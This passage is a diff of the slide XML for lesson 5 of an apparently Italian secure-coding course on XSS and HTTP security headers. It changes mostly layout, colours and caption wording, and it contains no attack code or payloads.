--- a/slide/L5_xss_header.pptx
+++ b/slide/L5_xss_header.pptx
@@ -3116,7 +3116,7 @@
             <a:avLst/>
           </a:prstGeom>
           <a:solidFill>
-            <a:srgbClr val="0F2D52"/>
+            <a:srgbClr val="081B33"/>
           </a:solidFill>
           <a:ln>
             <a:noFill/>
@@ -3152,8 +3152,8 @@
         </p:nvSpPr>
         <p:spPr>
           <a:xfrm>
-            <a:off x="0" y="914400"/>
-            <a:ext cx="365760" cy="2286000"/>
+            <a:off x="0" y="0"/>
+            <a:ext cx="12191695" cy="137160"/>
           </a:xfrm>
           <a:prstGeom prst="rect">
             <a:avLst/>
@@ -3189,14 +3189,186 @@
       </p:sp>
       <p:sp>
         <p:nvSpPr>
-          <p:cNvPr id="4" name="TextBox 3"/>
+          <p:cNvPr id="4" name="Oval 3"/>
+          <p:cNvSpPr/>
+          <p:nvPr/>
+        </p:nvSpPr>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="8686800" y="-914400"/>
+            <a:ext cx="2743200" cy="2743200"/>
+          </a:xfrm>
+          <a:prstGeom prst="ellipse">
+            <a:avLst/>
+          </a:prstGeom>
+          <a:noFill/>
+          <a:ln w="25400">
+            <a:solidFill>
+              <a:srgbClr val="00A0B0"/>
+            </a:solidFill>
+          </a:ln>
+        </p:spPr>
+        <p:style>
+          <a:lnRef idx="1">
+            <a:schemeClr val="accent1"/>
+          </a:lnRef>
+          <a:fillRef idx="3">
+            <a:schemeClr val="accent1"/>
+          </a:fillRef>
+          <a:effectRef idx="2">
+            <a:schemeClr val="accent1"/>
+          </a:effectRef>
+          <a:fontRef idx="minor">
+            <a:schemeClr val="lt1"/>
+          </a:fontRef>
+        </p:style>
+        <p:txBody>
+          <a:bodyPr rtlCol="0" anchor="ctr"/>
+          <a:lstStyle/>
+          <a:p>
+            <a:pPr algn="ctr"/>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="5" name="Oval 4"/>
+          <p:cNvSpPr/>
+          <p:nvPr/>
+        </p:nvSpPr>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="10515600" y="1371600"/>
+            <a:ext cx="1828800" cy="1828800"/>
+          </a:xfrm>
+          <a:prstGeom prst="ellipse">
+            <a:avLst/>
+          </a:prstGeom>
+          <a:noFill/>
+          <a:ln w="25400">
+            <a:solidFill>
+              <a:srgbClr val="00A0B0"/>
+            </a:solidFill>
+          </a:ln>
+        </p:spPr>
+        <p:style>
+          <a:lnRef idx="1">
+            <a:schemeClr val="accent1"/>
+          </a:lnRef>
+          <a:fillRef idx="3">
+            <a:schemeClr val="accent1"/>
+          </a:fillRef>
+          <a:effectRef idx="2">
+            <a:schemeClr val="accent1"/>
+          </a:effectRef>
+          <a:fontRef idx="minor">
+            <a:schemeClr val="lt1"/>
+          </a:fontRef>
+        </p:style>
+        <p:txBody>
+          <a:bodyPr rtlCol="0" anchor="ctr"/>
+          <a:lstStyle/>
+          <a:p>
+            <a:pPr algn="ctr"/>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="6" name="Oval 5"/>
+          <p:cNvSpPr/>
+          <p:nvPr/>
+        </p:nvSpPr>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="8458200" y="3429000"/>
+            <a:ext cx="2286000" cy="2286000"/>
+          </a:xfrm>
+          <a:prstGeom prst="ellipse">
+            <a:avLst/>
+          </a:prstGeom>
+          <a:noFill/>
+          <a:ln w="25400">
+            <a:solidFill>
+              <a:srgbClr val="00A0B0"/>
+            </a:solidFill>
+          </a:ln>
+        </p:spPr>
+        <p:style>
+          <a:lnRef idx="1">
+            <a:schemeClr val="accent1"/>
+          </a:lnRef>
+          <a:fillRef idx="3">
+            <a:schemeClr val="accent1"/>
+          </a:fillRef>
+          <a:effectRef idx="2">
+            <a:schemeClr val="accent1"/>
+          </a:effectRef>
+          <a:fontRef idx="minor">
+            <a:schemeClr val="lt1"/>
+          </a:fontRef>
+        </p:style>
+        <p:txBody>
+          <a:bodyPr rtlCol="0" anchor="ctr"/>
+          <a:lstStyle/>
+          <a:p>
+            <a:pPr algn="ctr"/>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="7" name="Rectangle 6"/>
+          <p:cNvSpPr/>
+          <p:nvPr/>
+        </p:nvSpPr>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="0" y="2286000"/>
+            <a:ext cx="228600" cy="2743200"/>
+          </a:xfrm>
+          <a:prstGeom prst="rect">
+            <a:avLst/>
+          </a:prstGeom>
+          <a:solidFill>
+            <a:srgbClr val="00A0B0"/>
+          </a:solidFill>
+          <a:ln>
+            <a:noFill/>
+          </a:ln>
+        </p:spPr>
+        <p:style>
+          <a:lnRef idx="1">
+            <a:schemeClr val="accent1"/>
+          </a:lnRef>
+          <a:fillRef idx="3">
+            <a:schemeClr val="accent1"/>
+          </a:fillRef>
+          <a:effectRef idx="2">
+            <a:schemeClr val="accent1"/>
+          </a:effectRef>
+          <a:fontRef idx="minor">
+            <a:schemeClr val="lt1"/>
+          </a:fontRef>
+        </p:style>
+        <p:txBody>
+          <a:bodyPr rtlCol="0" anchor="ctr"/>
+          <a:lstStyle/>
+          <a:p>
+            <a:pPr algn="ctr"/>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="8" name="TextBox 7"/>
           <p:cNvSpPr txBox="1"/>
           <p:nvPr/>
         </p:nvSpPr>
         <p:spPr>
           <a:xfrm>
-            <a:off x="731520" y="914400"/>
-            <a:ext cx="10058400" cy="548640"/>
+            <a:off x="548640" y="2286000"/>
+            <a:ext cx="7315200" cy="457200"/>
           </a:xfrm>
           <a:prstGeom prst="rect">
             <a:avLst/>
@@ -3211,7 +3383,7 @@
           <a:p>
             <a:pPr algn="l"/>
             <a:r>
-              <a:rPr sz="1800" b="1" i="0">
+              <a:rPr sz="1600" b="1" i="0">
                 <a:solidFill>
                   <a:srgbClr val="00A0B0"/>
                 </a:solidFill>
@@ -3224,14 +3396,14 @@
       </p:sp>
       <p:sp>
         <p:nvSpPr>
-          <p:cNvPr id="5" name="TextBox 4"/>
+          <p:cNvPr id="9" name="TextBox 8"/>
           <p:cNvSpPr txBox="1"/>
           <p:nvPr/>
         </p:nvSpPr>
         <p:spPr>
           <a:xfrm>
-            <a:off x="731520" y="1554480"/>
-            <a:ext cx="10058400" cy="1828800"/>
+            <a:off x="548640" y="2743200"/>
+            <a:ext cx="10515600" cy="2011680"/>
           </a:xfrm>
           <a:prstGeom prst="rect">
             <a:avLst/>
@@ -3246,7 +3418,7 @@
           <a:p>
             <a:pPr algn="l"/>
             <a:r>
-              <a:rPr sz="5400" b="1" i="0">
+              <a:rPr sz="5600" b="1" i="0">
                 <a:solidFill>
                   <a:srgbClr val="FFFFFF"/>
                 </a:solidFill>
@@ -3259,14 +3431,14 @@
       </p:sp>
       <p:sp>
         <p:nvSpPr>
-          <p:cNvPr id="6" name="TextBox 5"/>
+          <p:cNvPr id="10" name="TextBox 9"/>
           <p:cNvSpPr txBox="1"/>
           <p:nvPr/>
         </p:nvSpPr>
         <p:spPr>
           <a:xfrm>
-            <a:off x="731520" y="3566160"/>
-            <a:ext cx="10058400" cy="1097280"/>
+            <a:off x="548640" y="4572000"/>
+            <a:ext cx="10058400" cy="914400"/>
           </a:xfrm>
           <a:prstGeom prst="rect">
             <a:avLst/>
@@ -3281,27 +3453,107 @@
           <a:p>
             <a:pPr algn="l"/>
             <a:r>
-              <a:rPr sz="2400" b="0" i="1">
+              <a:rPr sz="2200" b="0" i="1">
+                <a:solidFill>
+                  <a:srgbClr val="6FD8E0"/>
+                </a:solidFill>
+                <a:latin typeface="Calibri"/>
+              </a:rPr>
+              <a:t>JavaScript dell'attaccante nel browser della vittima</a:t>
+            </a:r>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="11" name="Rounded Rectangle 10"/>
+          <p:cNvSpPr/>
+          <p:nvPr/>
+        </p:nvSpPr>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="548640" y="5669280"/>
+            <a:ext cx="2011680" cy="411480"/>
+          </a:xfrm>
+          <a:prstGeom prst="roundRect">
+            <a:avLst>
+              <a:gd name="adj" fmla="val 8000"/>
+            </a:avLst>
+          </a:prstGeom>
+          <a:solidFill>
+            <a:srgbClr val="00A0B0"/>
+          </a:solidFill>
+          <a:ln>
+            <a:noFill/>
+          </a:ln>
+        </p:spPr>
+        <p:style>
+          <a:lnRef idx="1">
+            <a:schemeClr val="accent1"/>
+          </a:lnRef>
+          <a:fillRef idx="3">
+            <a:schemeClr val="accent1"/>
+          </a:fillRef>
+          <a:effectRef idx="2">
+            <a:schemeClr val="accent1"/>
+          </a:effectRef>
+          <a:fontRef idx="minor">
+            <a:schemeClr val="lt1"/>
+          </a:fontRef>
+        </p:style>
+        <p:txBody>
+          <a:bodyPr rtlCol="0" anchor="ctr"/>
+          <a:lstStyle/>
+          <a:p>
+            <a:pPr algn="ctr"/>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="12" name="TextBox 11"/>
+          <p:cNvSpPr txBox="1"/>
+          <p:nvPr/>
+        </p:nvSpPr>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="548640" y="5669280"/>
+            <a:ext cx="2011680" cy="411480"/>
+          </a:xfrm>
+          <a:prstGeom prst="rect">
+            <a:avLst/>
+          </a:prstGeom>
+          <a:noFill/>
+        </p:spPr>
+        <p:txBody>
+          <a:bodyPr wrap="square" lIns="45720" rIns="45720" tIns="18288" bIns="18288" anchor="ctr">
+            <a:spAutoFit/>
+          </a:bodyPr>
+          <a:lstStyle/>
+          <a:p>
+            <a:pPr algn="ctr"/>
+            <a:r>
+              <a:rPr sz="1200" b="1" i="0">
                 <a:solidFill>
                   <a:srgbClr val="FFFFFF"/>
                 </a:solidFill>
                 <a:latin typeface="Calibri"/>
               </a:rPr>
-              <a:t>JavaScript dell'attaccante nel browser della vittima</a:t>
-            </a:r>
-          </a:p>
-        </p:txBody>
-      </p:sp>
-      <p:sp>
-        <p:nvSpPr>
-          <p:cNvPr id="7" name="TextBox 6"/>
+              <a:t>⏱  Lezione 5 · 2 ore</a:t>
+            </a:r>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="13" name="TextBox 12"/>
           <p:cNvSpPr txBox="1"/>
           <p:nvPr/>
         </p:nvSpPr>
         <p:spPr>
           <a:xfrm>
-            <a:off x="731520" y="5029200"/>
-            <a:ext cx="10058400" cy="457200"/>
+            <a:off x="548640" y="6263640"/>
+            <a:ext cx="10972800" cy="365760"/>
           </a:xfrm>
           <a:prstGeom prst="rect">
             <a:avLst/>
@@ -3316,83 +3568,13 @@
           <a:p>
             <a:pPr algn="l"/>
             <a:r>
-              <a:rPr sz="1800" b="1" i="0">
-                <a:solidFill>
-                  <a:srgbClr val="00A0B0"/>
-                </a:solidFill>
-                <a:latin typeface="Calibri"/>
-              </a:rPr>
-              <a:t>⏱  Lezione 5 · 2 ore</a:t>
-            </a:r>
-          </a:p>
-        </p:txBody>
-      </p:sp>
-      <p:sp>
-        <p:nvSpPr>
-          <p:cNvPr id="8" name="TextBox 7"/>
-          <p:cNvSpPr txBox="1"/>
-          <p:nvPr/>
-        </p:nvSpPr>
-        <p:spPr>
-          <a:xfrm>
-            <a:off x="731520" y="5943600"/>
-            <a:ext cx="10058400" cy="457200"/>
-          </a:xfrm>
-          <a:prstGeom prst="rect">
-            <a:avLst/>
-          </a:prstGeom>
-          <a:noFill/>
-        </p:spPr>
-        <p:txBody>
-          <a:bodyPr wrap="square" lIns="45720" rIns="45720" tIns="18288" bIns="18288" anchor="t">
-            <a:spAutoFit/>
-          </a:bodyPr>
-          <a:lstStyle/>
-          <a:p>
-            <a:pPr algn="l"/>
-            <a:r>
-              <a:rPr sz="1200" b="0" i="0">
-                <a:solidFill>
-                  <a:srgbClr val="FFFFFF"/>
-                </a:solidFill>
-                <a:latin typeface="Calibri"/>
-              </a:rPr>
-              <a:t>Corso IFTS STEM · Specialista nelle Tecniche di Evoluzione e Manutenzione del Software</a:t>
-            </a:r>
-          </a:p>
-        </p:txBody>
-      </p:sp>
-      <p:sp>
-        <p:nvSpPr>
-          <p:cNvPr id="9" name="TextBox 8"/>
-          <p:cNvSpPr txBox="1"/>
-          <p:nvPr/>
-        </p:nvSpPr>
-        <p:spPr>
-          <a:xfrm>
-            <a:off x="731520" y="6263640"/>
-            <a:ext cx="10058400" cy="365760"/>
-          </a:xfrm>
-          <a:prstGeom prst="rect">
-            <a:avLst/>
-          </a:prstGeom>
-          <a:noFill/>
-        </p:spPr>
-        <p:txBody>
-          <a:bodyPr wrap="square" lIns="45720" rIns="45720" tIns="18288" bIns="18288" anchor="t">
-            <a:spAutoFit/>
-          </a:bodyPr>
-          <a:lstStyle/>
-          <a:p>
-            <a:pPr algn="l"/>
-            <a:r>
-              <a:rPr sz="1100" b="0" i="1">
-                <a:solidFill>
-                  <a:srgbClr val="FFFFFF"/>
-                </a:solidFill>
-                <a:latin typeface="Calibri"/>
-              </a:rPr>
-              <a:t>Ing. Alessandro Manneschi · Anno formativo 2024/2025</a:t>
+              <a:rPr sz="1000" b="0" i="0">
+                <a:solidFill>
+                  <a:srgbClr val="CBD0D8"/>
+                </a:solidFill>
+                <a:latin typeface="Calibri"/>
+              </a:rPr>
+              <a:t>Corso IFTS STEM · Ing. Alessandro Manneschi · 2024/2025</a:t>
             </a:r>
           </a:p>
         </p:txBody>
@@ -3424,7 +3606,7 @@
         <p:spPr>
           <a:xfrm>
             <a:off x="0" y="0"/>
-            <a:ext cx="2286000" cy="6858000"/>
+            <a:ext cx="12191695" cy="777240"/>
           </a:xfrm>
           <a:prstGeom prst="rect">
             <a:avLst/>
@@ -3466,277 +3648,6 @@
         </p:nvSpPr>
         <p:spPr>
           <a:xfrm>
-            <a:off x="274320" y="2286000"/>
-            <a:ext cx="1828800" cy="1828800"/>
-          </a:xfrm>
-          <a:prstGeom prst="rect">
-            <a:avLst/>
-          </a:prstGeom>
-          <a:noFill/>
-        </p:spPr>
-        <p:txBody>
-          <a:bodyPr wrap="square" lIns="45720" rIns="45720" tIns="18288" bIns="18288" anchor="t">
-            <a:spAutoFit/>
-          </a:bodyPr>
-          <a:lstStyle/>
-          <a:p>
-            <a:pPr algn="ctr"/>
-            <a:r>
-              <a:rPr sz="12000" b="1" i="0">
-                <a:solidFill>
-                  <a:srgbClr val="00A0B0"/>
-                </a:solidFill>
-                <a:latin typeface="Calibri"/>
-              </a:rPr>
-              <a:t>02</a:t>
-            </a:r>
-          </a:p>
-        </p:txBody>
-      </p:sp>
-      <p:sp>
-        <p:nvSpPr>
-          <p:cNvPr id="4" name="TextBox 3"/>
-          <p:cNvSpPr txBox="1"/>
-          <p:nvPr/>
-        </p:nvSpPr>
-        <p:spPr>
-          <a:xfrm>
-            <a:off x="2743200" y="2560320"/>
-            <a:ext cx="8961120" cy="1371600"/>
-          </a:xfrm>
-          <a:prstGeom prst="rect">
-            <a:avLst/>
-          </a:prstGeom>
-          <a:noFill/>
-        </p:spPr>
-        <p:txBody>
-          <a:bodyPr wrap="square" lIns="45720" rIns="45720" tIns="18288" bIns="18288" anchor="t">
-            <a:spAutoFit/>
-          </a:bodyPr>
-          <a:lstStyle/>
-          <a:p>
-            <a:pPr algn="l"/>
-            <a:r>
-              <a:rPr sz="4200" b="1" i="0">
-                <a:solidFill>
-                  <a:srgbClr val="0F2D52"/>
-                </a:solidFill>
-                <a:latin typeface="Calibri"/>
-              </a:rPr>
-              <a:t>Header HTTP di sicurezza</a:t>
-            </a:r>
-          </a:p>
-        </p:txBody>
-      </p:sp>
-      <p:sp>
-        <p:nvSpPr>
-          <p:cNvPr id="5" name="TextBox 4"/>
-          <p:cNvSpPr txBox="1"/>
-          <p:nvPr/>
-        </p:nvSpPr>
-        <p:spPr>
-          <a:xfrm>
-            <a:off x="2743200" y="3931920"/>
-            <a:ext cx="8961120" cy="1828800"/>
-          </a:xfrm>
-          <a:prstGeom prst="rect">
-            <a:avLst/>
-          </a:prstGeom>
-          <a:noFill/>
-        </p:spPr>
-        <p:txBody>
-          <a:bodyPr wrap="square" lIns="45720" rIns="45720" tIns="18288" bIns="18288" anchor="t">
-            <a:spAutoFit/>
-          </a:bodyPr>
-          <a:lstStyle/>
-          <a:p>
-            <a:pPr algn="l"/>
-            <a:r>
-              <a:rPr sz="1800" b="0" i="1">
-                <a:solidFill>
-                  <a:srgbClr val="6B7280"/>
-                </a:solidFill>
-                <a:latin typeface="Calibri"/>
-              </a:rPr>
-              <a:t>Configurazione rapida, difese potenti</a:t>
-            </a:r>
-          </a:p>
-        </p:txBody>
-      </p:sp>
-      <p:cxnSp>
-        <p:nvCxnSpPr>
-          <p:cNvPr id="6" name="Connector 5"/>
-          <p:cNvCxnSpPr/>
-          <p:nvPr/>
-        </p:nvCxnSpPr>
-        <p:spPr>
-          <a:xfrm>
-            <a:off x="457200" y="6446520"/>
-            <a:ext cx="11274552" cy="0"/>
-          </a:xfrm>
-          <a:prstGeom prst="line">
-            <a:avLst/>
-          </a:prstGeom>
-          <a:ln w="19050">
-            <a:solidFill>
-              <a:srgbClr val="00A0B0"/>
-            </a:solidFill>
-          </a:ln>
-        </p:spPr>
-        <p:style>
-          <a:lnRef idx="2">
-            <a:schemeClr val="accent1"/>
-          </a:lnRef>
-          <a:fillRef idx="0">
-            <a:schemeClr val="accent1"/>
-          </a:fillRef>
-          <a:effectRef idx="1">
-            <a:schemeClr val="accent1"/>
-          </a:effectRef>
-          <a:fontRef idx="minor">
-            <a:schemeClr val="tx1"/>
-          </a:fontRef>
-        </p:style>
-      </p:cxnSp>
-      <p:sp>
-        <p:nvSpPr>
-          <p:cNvPr id="7" name="TextBox 6"/>
-          <p:cNvSpPr txBox="1"/>
-          <p:nvPr/>
-        </p:nvSpPr>
-        <p:spPr>
-          <a:xfrm>
-            <a:off x="457200" y="6473952"/>
-            <a:ext cx="7315200" cy="320040"/>
-          </a:xfrm>
-          <a:prstGeom prst="rect">
-            <a:avLst/>
-          </a:prstGeom>
-          <a:noFill/>
-        </p:spPr>
-        <p:txBody>
-          <a:bodyPr wrap="square" lIns="45720" rIns="45720" tIns="18288" bIns="18288" anchor="t">
-            <a:spAutoFit/>
-          </a:bodyPr>
-          <a:lstStyle/>
-          <a:p>
-            <a:pPr algn="l"/>
-            <a:r>
-              <a:rPr sz="1000" b="0" i="0">
-                <a:solidFill>
-                  <a:srgbClr val="6B7280"/>
-                </a:solidFill>
-                <a:latin typeface="Calibri"/>
-              </a:rPr>
-              <a:t>Secure Coding · Corso IFTS STEM · A. Manneschi</a:t>
-            </a:r>
-          </a:p>
-        </p:txBody>
-      </p:sp>
-      <p:sp>
-        <p:nvSpPr>
-          <p:cNvPr id="8" name="TextBox 7"/>
-          <p:cNvSpPr txBox="1"/>
-          <p:nvPr/>
-        </p:nvSpPr>
-        <p:spPr>
-          <a:xfrm>
-            <a:off x="10515600" y="6473952"/>
-            <a:ext cx="1188720" cy="320040"/>
-          </a:xfrm>
-          <a:prstGeom prst="rect">
-            <a:avLst/>
-          </a:prstGeom>
-          <a:noFill/>
-        </p:spPr>
-        <p:txBody>
-          <a:bodyPr wrap="square" lIns="45720" rIns="45720" tIns="18288" bIns="18288" anchor="t">
-            <a:spAutoFit/>
-          </a:bodyPr>
-          <a:lstStyle/>
-          <a:p>
-            <a:pPr algn="r"/>
-            <a:r>
-              <a:rPr sz="1000" b="1" i="0">
-                <a:solidFill>
-                  <a:srgbClr val="6B7280"/>
-                </a:solidFill>
-                <a:latin typeface="Calibri"/>
-              </a:rPr>
-              <a:t>L5  ·  10/14</a:t>
-            </a:r>
-          </a:p>
-        </p:txBody>
-      </p:sp>
-    </p:spTree>
-  </p:cSld>
-  <p:clrMapOvr>
-    <a:masterClrMapping/>
-  </p:clrMapOvr>
-</p:sld>
-</file>
-
-<file path=ppt/slides/slide11.xml><?xml version="1.0" encoding="utf-8"?>
-<p:sld xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships">
-  <p:cSld>
-    <p:spTree>
-      <p:nvGrpSpPr>
-        <p:cNvPr id="1" name=""/>
-        <p:cNvGrpSpPr/>
-        <p:nvPr/>
-      </p:nvGrpSpPr>
-      <p:grpSpPr/>
-      <p:sp>
-        <p:nvSpPr>
-          <p:cNvPr id="2" name="Rectangle 1"/>
-          <p:cNvSpPr/>
-          <p:nvPr/>
-        </p:nvSpPr>
-        <p:spPr>
-          <a:xfrm>
-            <a:off x="0" y="0"/>
-            <a:ext cx="12191695" cy="777240"/>
-          </a:xfrm>
-          <a:prstGeom prst="rect">
-            <a:avLst/>
-          </a:prstGeom>
-          <a:solidFill>
-            <a:srgbClr val="0F2D52"/>
-          </a:solidFill>
-          <a:ln>
-            <a:noFill/>
-          </a:ln>
-        </p:spPr>
-        <p:style>
-          <a:lnRef idx="1">
-            <a:schemeClr val="accent1"/>
-          </a:lnRef>
-          <a:fillRef idx="3">
-            <a:schemeClr val="accent1"/>
-          </a:fillRef>
-          <a:effectRef idx="2">
-            <a:schemeClr val="accent1"/>
-          </a:effectRef>
-          <a:fontRef idx="minor">
-            <a:schemeClr val="lt1"/>
-          </a:fontRef>
-        </p:style>
-        <p:txBody>
-          <a:bodyPr rtlCol="0" anchor="ctr"/>
-          <a:lstStyle/>
-          <a:p>
-            <a:pPr algn="ctr"/>
-          </a:p>
-        </p:txBody>
-      </p:sp>
-      <p:sp>
-        <p:nvSpPr>
-          <p:cNvPr id="3" name="TextBox 2"/>
-          <p:cNvSpPr txBox="1"/>
-          <p:nvPr/>
-        </p:nvSpPr>
-        <p:spPr>
-          <a:xfrm>
             <a:off x="457200" y="164592"/>
             <a:ext cx="10972800" cy="502920"/>
           </a:xfrm>
@@ -3759,7 +3670,7 @@
                 </a:solidFill>
                 <a:latin typeface="Calibri"/>
               </a:rPr>
-              <a:t>I 6 header di sicurezza fondamentali</a:t>
+              <a:t>I 6 header di sicurezza</a:t>
             </a:r>
           </a:p>
         </p:txBody>
@@ -3774,7 +3685,7 @@
         </p:nvGraphicFramePr>
         <p:xfrm>
           <a:off x="457200" y="1188720"/>
-          <a:ext cx="11247120" cy="5029200"/>
+          <a:ext cx="11247120" cy="4937760"/>
         </p:xfrm>
         <a:graphic>
           <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
@@ -3786,7 +3697,7 @@
                 <a:gridCol w="5623560"/>
                 <a:gridCol w="5623560"/>
               </a:tblGrid>
-              <a:tr h="718457">
+              <a:tr h="705394">
                 <a:tc>
                   <a:txBody>
                     <a:bodyPr/>
@@ -3794,7 +3705,7 @@
                     <a:p>
                       <a:pPr algn="ctr"/>
                       <a:r>
-                        <a:rPr sz="1400" b="1">
+                        <a:rPr sz="1300" b="1">
                           <a:solidFill>
                             <a:srgbClr val="FFFFFF"/>
                           </a:solidFill>
@@ -3817,7 +3728,7 @@
                     <a:p>
                       <a:pPr algn="ctr"/>
                       <a:r>
-                        <a:rPr sz="1400" b="1">
+                        <a:rPr sz="1300" b="1">
                           <a:solidFill>
                             <a:srgbClr val="FFFFFF"/>
                           </a:solidFill>
@@ -3834,15 +3745,14 @@
                   </a:tcPr>
                 </a:tc>
               </a:tr>
-              <a:tr h="718457">
+              <a:tr h="705394">
                 <a:tc>
                   <a:txBody>
                     <a:bodyPr/>
                     <a:lstStyle/>
                     <a:p>
-                      <a:pPr algn="l"/>
                       <a:r>
-                        <a:rPr sz="1200">
+                        <a:rPr sz="1100">
                           <a:solidFill>
                             <a:srgbClr val="1A1A2E"/>
                           </a:solidFill>
@@ -3863,9 +3773,8 @@
                     <a:bodyPr/>
                     <a:lstStyle/>
                     <a:p>
-                      <a:pPr algn="l"/>
                       <a:r>
-                        <a:rPr sz="1200">
+                        <a:rPr sz="1100">
                           <a:solidFill>
                             <a:srgbClr val="1A1A2E"/>
                           </a:solidFill>
@@ -3882,15 +3791,14 @@
                   </a:tcPr>
                 </a:tc>
               </a:tr>
-              <a:tr h="718457">
+              <a:tr h="705394">
                 <a:tc>
                   <a:txBody>
                     <a:bodyPr/>
                     <a:lstStyle/>
                     <a:p>
-                      <a:pPr algn="l"/>
                       <a:r>
-                        <a:rPr sz="1200">
+                        <a:rPr sz="1100">
                           <a:solidFill>
                             <a:srgbClr val="1A1A2E"/>
                           </a:solidFill>
@@ -3911,9 +3819,8 @@
                     <a:bodyPr/>
                     <a:lstStyle/>
                     <a:p>
-                      <a:pPr algn="l"/>
                       <a:r>
-                        <a:rPr sz="1200">
+                        <a:rPr sz="1100">
                           <a:solidFill>
                             <a:srgbClr val="1A1A2E"/>
                           </a:solidFill>
@@ -3930,15 +3837,14 @@
                   </a:tcPr>
                 </a:tc>
               </a:tr>
-              <a:tr h="718457">
+              <a:tr h="705394">
                 <a:tc>
                   <a:txBody>
                     <a:bodyPr/>
                     <a:lstStyle/>
                     <a:p>
-                      <a:pPr algn="l"/>
                       <a:r>
-                        <a:rPr sz="1200">
+                        <a:rPr sz="1100">
                           <a:solidFill>
                             <a:srgbClr val="1A1A2E"/>
                           </a:solidFill>
@@ -3959,9 +3865,8 @@
                     <a:bodyPr/>
                     <a:lstStyle/>
                     <a:p>
-                      <a:pPr algn="l"/>
                       <a:r>
-                        <a:rPr sz="1200">
+                        <a:rPr sz="1100">
                           <a:solidFill>
                             <a:srgbClr val="1A1A2E"/>
                           </a:solidFill>
@@ -3978,15 +3883,14 @@
                   </a:tcPr>
                 </a:tc>
               </a:tr>
-              <a:tr h="718457">
+              <a:tr h="705394">
                 <a:tc>
                   <a:txBody>
                     <a:bodyPr/>
                     <a:lstStyle/>
                     <a:p>
-                      <a:pPr algn="l"/>
                       <a:r>
-                        <a:rPr sz="1200">
+                        <a:rPr sz="1100">
                           <a:solidFill>
                             <a:srgbClr val="1A1A2E"/>
                           </a:solidFill>
@@ -4007,15 +3911,14 @@
                     <a:bodyPr/>
                     <a:lstStyle/>
                     <a:p>
-                      <a:pPr algn="l"/>
                       <a:r>
-                        <a:rPr sz="1200">
+                        <a:rPr sz="1100">
                           <a:solidFill>
                             <a:srgbClr val="1A1A2E"/>
                           </a:solidFill>
                           <a:latin typeface="Calibri"/>
                         </a:rPr>
-                        <a:t>Blocca MIME sniffing del browser</a:t>
+                        <a:t>Blocca MIME sniffing</a:t>
                       </a:r>
                     </a:p>
                   </a:txBody>
@@ -4026,15 +3929,14 @@
                   </a:tcPr>
                 </a:tc>
               </a:tr>
-              <a:tr h="718457">
+              <a:tr h="705394">
                 <a:tc>
                   <a:txBody>
                     <a:bodyPr/>
                     <a:lstStyle/>
                     <a:p>
-                      <a:pPr algn="l"/>
                       <a:r>
-                        <a:rPr sz="1200">
+                        <a:rPr sz="1100">
                           <a:solidFill>
                             <a:srgbClr val="1A1A2E"/>
                           </a:solidFill>
@@ -4055,9 +3957,8 @@
                     <a:bodyPr/>
                     <a:lstStyle/>
                     <a:p>
-                      <a:pPr algn="l"/>
                       <a:r>
-                        <a:rPr sz="1200">
+                        <a:rPr sz="1100">
                           <a:solidFill>
                             <a:srgbClr val="1A1A2E"/>
                           </a:solidFill>
@@ -4074,15 +3975,14 @@
                   </a:tcPr>
                 </a:tc>
               </a:tr>
-              <a:tr h="718458">
+              <a:tr h="705396">
                 <a:tc>
                   <a:txBody>
                     <a:bodyPr/>
                     <a:lstStyle/>
                     <a:p>
-                      <a:pPr algn="l"/>
                       <a:r>
-                        <a:rPr sz="1200">
+                        <a:rPr sz="1100">
                           <a:solidFill>
                             <a:srgbClr val="1A1A2E"/>
                           </a:solidFill>
@@ -4103,15 +4003,14 @@
                     <a:bodyPr/>
                     <a:lstStyle/>
                     <a:p>
-                      <a:pPr algn="l"/>
                       <a:r>
-                        <a:rPr sz="1200">
+                        <a:rPr sz="1100">
                           <a:solidFill>
                             <a:srgbClr val="1A1A2E"/>
                           </a:solidFill>
                           <a:latin typeface="Calibri"/>
                         </a:rPr>
-                        <a:t>Limita API browser (camera, mic, geoloc)</a:t>
+                        <a:t>Limita API browser (camera, mic)</a:t>
                       </a:r>
                     </a:p>
                   </a:txBody>
@@ -4170,7 +4069,7 @@
         <p:spPr>
           <a:xfrm>
             <a:off x="457200" y="6473952"/>
-            <a:ext cx="7315200" cy="320040"/>
+            <a:ext cx="7315200" cy="292608"/>
           </a:xfrm>
           <a:prstGeom prst="rect">
             <a:avLst/>
@@ -4191,7 +4090,7 @@
                 </a:solidFill>
                 <a:latin typeface="Calibri"/>
               </a:rPr>
-              <a:t>Secure Coding · Corso IFTS STEM · A. Manneschi</a:t>
+              <a:t>Secure Coding · Corso IFTS STEM · A. Manneschi · 2024/2025</a:t>
             </a:r>
           </a:p>
         </p:txBody>
@@ -4205,7 +4104,1120 @@
         <p:spPr>
           <a:xfrm>
             <a:off x="10515600" y="6473952"/>
-            <a:ext cx="1188720" cy="320040"/>
+            <a:ext cx="1188720" cy="292608"/>
+          </a:xfrm>
+          <a:prstGeom prst="rect">
+            <a:avLst/>
+          </a:prstGeom>
+          <a:noFill/>
+        </p:spPr>
+        <p:txBody>
+          <a:bodyPr wrap="square" lIns="45720" rIns="45720" tIns="18288" bIns="18288" anchor="t">
+            <a:spAutoFit/>
+          </a:bodyPr>
+          <a:lstStyle/>
+          <a:p>
